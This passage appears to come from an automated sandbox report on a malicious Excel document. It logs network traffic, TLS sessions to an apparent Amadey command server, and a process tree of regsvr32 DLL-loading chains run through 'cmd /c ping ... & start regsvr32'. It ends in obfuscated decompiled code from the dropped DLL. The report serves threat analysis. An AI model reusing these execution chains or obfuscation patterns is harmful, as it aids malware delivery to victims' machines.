                                                                                                                                                      Jun 9, 2021 15:21:56.973902941 CEST5529953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:57.028814077 CEST53552998.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:57.771101952 CEST6374553192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:57.822587013 CEST53637458.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:59.385391951 CEST5005553192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:59.440799952 CEST53500558.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:59.850233078 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:59.908941984 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:05.187127113 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:05.240174055 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:06.356194973 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:06.411145926 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:07.310992002 CEST6330753192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:07.364352942 CEST53633078.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:08.822825909 CEST4969453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:08.872876883 CEST53496948.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:10.216510057 CEST5498253192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:10.277961016 CEST53549828.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:12.805483103 CEST5001053192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:12.879868031 CEST53500108.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:33.340646982 CEST6371853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:33.401187897 CEST53637188.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:35.480846882 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:35.617012978 CEST53621168.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:36.693973064 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:36.752301931 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:37.430131912 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:37.571043968 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:37.991182089 CEST6220853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:38.050961018 CEST53622088.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:38.482630014 CEST5757453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:38.550734043 CEST53575748.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:38.699526072 CEST5181853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:38.760968924 CEST53518188.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:39.343851089 CEST5662853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:39.405417919 CEST53566288.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:39.908086061 CEST6077853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:39.969800949 CEST53607788.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:40.793365002 CEST5379953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:40.852049112 CEST53537998.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:41.757324934 CEST5468353192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:41.818587065 CEST53546838.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:42.288892984 CEST5932953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:42.350413084 CEST53593298.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:50.255160093 CEST6402153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:50.318708897 CEST53640218.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:00.317203999 CEST5612953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:00.378262997 CEST53561298.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:16.410259008 CEST5817753192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:16.469381094 CEST53581778.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:34.410224915 CEST5070053192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:34.482976913 CEST53507008.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:35.993652105 CEST5406953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:36.063276052 CEST53540698.8.8.8192.168.2.6

                                                                                                                                                      ICMP Packets

                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                      Jun 9, 2021 15:22:05.833841085 CEST192.168.2.68.8.7.74d5aEcho
                                                                                                                                                      Jun 9, 2021 15:22:10.528872013 CEST192.168.2.68.8.7.74d59Echo
                                                                                                                                                      Jun 9, 2021 15:22:20.469414949 CEST192.168.2.68.8.7.74d58Echo
                                                                                                                                                      Jun 9, 2021 15:22:25.029455900 CEST192.168.2.68.8.7.74d57Echo
                                                                                                                                                      Jun 9, 2021 15:22:36.677659035 CEST192.168.2.68.8.7.74d56Echo
                                                                                                                                                      Jun 9, 2021 15:22:41.530548096 CEST192.168.2.68.8.7.74d55Echo

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Jun 9, 2021 15:21:55.219571114 CEST192.168.2.68.8.8.80x9318Standard query (0)tpfcu.comA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Jun 9, 2021 15:21:55.279922962 CEST8.8.8.8192.168.2.60x9318No error (0)tpfcu.com107.180.50.232A (IP address)IN (0x0001)

                                                                                                                                                      HTTPS Packets

                                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                      Jun 9, 2021 15:21:55.561739922 CEST107.180.50.232443192.168.2.649715CN=tpfcu.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USFri Mar 05 15:44:31 CET 2021 Tue May 03 09:00:00 CEST 2011Wed Apr 06 16:44:31 CEST 2022 Sat May 03 09:00:00 CEST 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                      Jun 9, 2021 15:22:49.386614084 CEST18.117.84.120443192.168.2.649740CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATCN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATWed Jun 09 10:22:21 CEST 2021Thu Jun 09 10:22:21 CEST 2022771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,08916410db85077a5460817142dcbc8de
                                                                                                                                                      Jun 9, 2021 15:23:25.363224030 CEST18.117.84.120443192.168.2.649747CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATCN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATWed Jun 09 10:22:21 CEST 2021Thu Jun 09 10:22:21 CEST 2022771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,08916410db85077a5460817142dcbc8de
                                                                                                                                                      Jun 9, 2021 15:23:57.298791885 CEST18.117.84.120443192.168.2.649750CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATCN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATWed Jun 09 10:22:21 CEST 2021Thu Jun 09 10:22:21 CEST 2022771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,08916410db85077a5460817142dcbc8de

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      Analysis Process: EXCEL.EXE PID: 6528 Parent PID: 792

                                                                                                                                                      General

                                                                                                                                                      Start time:15:21:49
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x10000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6796 Parent PID: 6528

                                                                                                                                                      General

                                                                                                                                                      Start time:15:21:55
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 -s ..\iepfusn.dll
                                                                                                                                                      Imagebase:0xe50000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6848 Parent PID: 6796

                                                                                                                                                      General

                                                                                                                                                      Start time:15:21:56
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline: -s ..\iepfusn.dll
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: cmd.exe PID: 6980 Parent PID: 6848

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:03
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
                                                                                                                                                      Imagebase:0x7ff7180e0000
                                                                                                                                                      File size:273920 bytes
                                                                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: conhost.exe PID: 6988 Parent PID: 6980

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:04
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff61de10000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: PING.EXE PID: 7032 Parent PID: 6980

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:04
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:ping 8.8.7.7 -n 2
                                                                                                                                                      Imagebase:0x7ff612a90000
                                                                                                                                                      File size:21504 bytes
                                                                                                                                                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 5712 Parent PID: 6980

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:13
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: cmd.exe PID: 1724 Parent PID: 5712

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:17
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
                                                                                                                                                      Imagebase:0x7ff7180e0000
                                                                                                                                                      File size:273920 bytes
                                                                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: conhost.exe PID: 1808 Parent PID: 1724

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:18
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff61de10000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: PING.EXE PID: 6196 Parent PID: 1724

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:19
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:ping 8.8.7.7 -n 2
                                                                                                                                                      Imagebase:0x7ff612a90000
                                                                                                                                                      File size:21504 bytes
                                                                                                                                                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6356 Parent PID: 1724

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:28
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: cmd.exe PID: 6896 Parent PID: 6356

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:34
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
                                                                                                                                                      Imagebase:0x7ff7180e0000
                                                                                                                                                      File size:273920 bytes
                                                                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: conhost.exe PID: 5680 Parent PID: 6896

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:34
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff61de10000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: PING.EXE PID: 6092 Parent PID: 6896

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:35
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:ping 8.8.7.7 -n 2
                                                                                                                                                      Imagebase:0x7ff612a90000
                                                                                                                                                      File size:21504 bytes
                                                                                                                                                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6872 Parent PID: 3440

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:43
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6824 Parent PID: 6896

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:44
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 400 Parent PID: 3440

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:51
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >

                                                                                                                                                        Analysis Process: regsvr32.exe PID: 6848 Parent PID: 6796 regsvr32.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 012E02A4, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 542COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E012E02A4(void* __ebx, void* __ecx, void* __edx, signed int __esi, signed long long __rax, signed long long __rcx, char* __r8, void* __r9, void* __r11) {
				signed long long _v72;
				void* _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed long long _v104;
				void* _v112;
				signed long long _v120;
				intOrPtr _v124;
				signed long long _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _t111;
				void* _t115;
				void* _t197;
				signed int _t201;
				void* _t258;
				void* _t268;
				signed int _t269;
				signed int _t271;
				signed long long _t283;
				long long* _t284;
				long long* _t285;
				char* _t290;
				signed long long _t292;
				void* _t305;
				void* _t306;

				_t306 = __r11;
				_t305 = __r9;
				_t304 = __r8;
				_t292 = __rcx;
				_t283 = __rax;
				_t269 = __esi;
				_t197 = __ebx;
				_t290 = __r8;
				_t271 =  ==  ? 0xf29a3544 : 0x9fd7756b;
				r14d = 0x701b759;
				_t258 =  ==  ? r14d : 0xd9502225;
				_v84 = 0xd9502225;
				_t200 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_v88 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_t109 =  ==  ? r14d : 0xa912c783;
				_v92 =  ==  ? r14d : 0xa912c783;
				r15d = 0xda537fa7;
				r15d =  ==  ? 0x170b999c : r15d;
				_t111 = 0xca288c41;
				_t268 = 0x79849ae;
				while(1) {
					L1:
					_v120 = _t292;
					while(1) {
						L2:
						_t201 = _t111;
						if(_t111 > 0xf29a3543) {
							goto L10;
						}
						L3:
						if(_t201 <= 0xb0b3b625) {
							__eflags = _t201 - 0x93c76e2c;
							if(_t201 > 0x93c76e2c) {
								__eflags = _t201 - 0x9fd7756a;
								if(_t201 > 0x9fd7756a) {
									__eflags = _t201 - 0x9fd7756b;
									if(_t201 == 0x9fd7756b) {
										E012DCDB9(0x30, _t283);
										_v104 = _t283;
										_t284 = _v104;
										_v112 = _t284;
										r8d = 0x18d1ea71;
										r9d = 0x2b;
										E012DFAD7(1, _t269, _t284, _t292);
										 *_t284();
										_t285 =  *[gs:0x60];
										r8d = 0x27c2b783;
										r9d = 0xd;
										E012DFAD7(1, _t269, _t285, _t292);
										r8d = 0x30;
										_t299 = _v112;
										r14d = 0x701b759;
										 *_t285();
										_t292 = 0x12e02a4;
										_t283 =  *((intOrPtr*)(_v112 + 0x18)) + 0x12e02a4;
										_v72 = _t283;
										__eflags =  *((intOrPtr*)(_t285 + 0x10)) - 0x12e02a4;
										_t268 = 0x79849ae;
										_t111 =  >  ? 0xb0b3b626 : 0x2f0fb31e;
									} else {
										__eflags = _t201 - 0xa1a997a0;
										if(_t201 == 0xa1a997a0) {
											_v144 = r13d;
											__eflags = _v144 - 0x1520f;
											_t111 =  <  ? 0xea392f63 : 0x859994e5;
										} else {
											_t111 = _t201;
											__eflags = _t201 - 0xa912c783;
											if(_t201 == 0xa912c783) {
												__eflags =  *_t290;
												_t111 =  ==  ? r14d : 0x170b999c;
											}
										}
									}
									while(1) {
										L2:
										_t201 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
								}
								__eflags = _t201 - 0x93c76e2d;
								if(_t201 == 0x93c76e2d) {
									_t292 = _v136;
									E012DA4E4(_t292);
									L107:
									_t111 = 0xb42b969a;
									while(1) {
										L2:
										_t201 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
									goto L10;
								}
								__eflags = _t201 - 0x945c137a;
								if(_t201 == 0x945c137a) {
									goto L107;
								} else {
									_t111 = _t201;
									__eflags = _t201 - 0x9a2c0e1f;
									if(_t201 == 0x9a2c0e1f) {
										r13d = _v144;
										r13d = r13d + 3;
										_t111 = 0xa1a997a0;
									}
									continue;
								}
							}
							__eflags = _t201 - 0x859994e4;
							if(_t201 > 0x859994e4) {
								__eflags = _t201 - 0x859994e5;
								if(_t201 == 0x859994e5) {
									__eflags = _v152 + _v164 + _v156 - 0xf302e;
									_t111 =  ==  ? 0x6dc18416 : 0x2e98952d;
									continue;
								}
								__eflags = _t201 - 0x91685319;
								if(_t201 == 0x91685319) {
									_t111 = 0xbe5a0f3f;
									continue;
								}
								_t111 = _t201;
								__eflags = _t201 - 0x91ac664b;
								if(_t201 != 0x91ac664b) {
									continue;
								}
								_t292 = _v136;
								__eflags = E012DA8E0(_t292);
								_t115 = 0x51fb7187;
								L112:
								_t111 =  !=  ? 0xb42b969a : _t115;
								continue;
							}
							__eflags = _t201 - 0x834d46ed;
							if(_t201 == 0x834d46ed) {
								_v152 = (_v156 + 0xfffffffc) * _v164 - _v144 * _v140;
								_v164 = _t292 + _t283 * 2 - _v140 + 0xfffffc19;
								_t262 =  ~(_v152 + _v164) * _v156;
								_v156 = _t292 + _t292 * 2 + _t283 + _t292 * 8 +  ~(_v152 + _v164) * _v156;
								r12d = _v140;
								r12d = r12d + 5;
								_t111 = 0x34527dc1;
								continue;
							}
							__eflags = _t201 - 0x843901b2;
							if(_t201 == 0x843901b2) {
								__eflags = _v148 - 4;
								_t111 =  <  ? 0xe4701c02 : 0x13aae927;
								continue;
							}
							_t111 = _t201;
							__eflags = _t201 - 0x854a966f;
							if(_t201 == 0x854a966f) {
								return _t111;
							} else {
								continue;
							}
						}
						if(_t201 > 0xca288c40) {
							__eflags = _t201 - 0xe4701c01;
							if(_t201 > 0xe4701c01) {
								__eflags = _t201 - 0xe4701c02;
								if(_t201 == 0xe4701c02) {
									__eflags = _v148 - 2;
									_t111 =  <  ? _t268 : 0x91685319;
									continue;
								}
								__eflags = _t201 - 0xea392f63;
								if(_t201 == 0xea392f63) {
									_t111 = 0x34527dc1;
									r12d = 0;
									continue;
								}
								_t111 = _t201;
								__eflags = _t201 - 0xeb6755e2;
								if(_t201 != 0xeb6755e2) {
									continue;
								}
								__eflags = _v148 - 4;
								L96:
								_t111 =  ==  ? _t268 : 0x91685319;
							} else {
								_t111 = r15d;
